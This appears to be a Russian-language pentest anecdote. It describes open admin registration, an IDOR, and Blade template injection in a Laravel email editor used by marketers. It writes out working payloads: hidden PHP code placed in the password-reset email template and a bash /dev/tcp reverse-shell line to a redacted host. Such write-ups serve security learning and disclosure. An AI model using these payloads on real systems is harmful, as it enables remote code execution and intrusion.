Кстати, а это про #поИб прямо и про самых заядлых нарушителей политик и вредителей безопасности ИБ в компании -- маркетологов! Они хотят и внешние JS притащить, и сервисы какие-то прокинуть и лендосостроителями быть на внещних сервисах да так, чтобы потом и DNS забыть удалить и довести до subdomain takeover, но сейчас не про это.

В рамках одно пентеста был просто неистовый ор и
1. Регистрация в админке, которая реально работает (да да да)
2. Конечно, там не всё доступно, функциональность урезана, но частично оказалась доступна функциональность редактирования писем с IDOR (дооо, это как оказалось потом -- это было очень нужно маркетологам было чтобы они быстро меняли тексты для нужд бизнеса). И вот когда я увидел там конструкцию {{smtng}}, да и зная что там #laravel стало понятно что перед лицом blade шаблонизатор в котором есть RCE через @php /*code*/ @endphp
3. Да, я взял первый попавшийся шаблон, а это было восстановление пароля, вставил туда <div style="display:none">@php phpinfo(); @endphp</div> и получил себе phpinfo в почту. Но так как это аффектило всех юзеров -- я сделал это невидимым через <div style="display:none">.

Что дальше можно сделать? Да все что угодно, да хоть ревесшел открывать через <div style="display:none">@php exec("/bin/bash -c 'bash -i >& /dev/tcp/REDACTED/8433 0>&1'"); @endphp</div>.
Маркетологи с их хотелками, которые ходят мимо ИБ -- зло, а разработчики что дают шаблонизаторы без секьбрити политик и ограничений -- тоже зло :)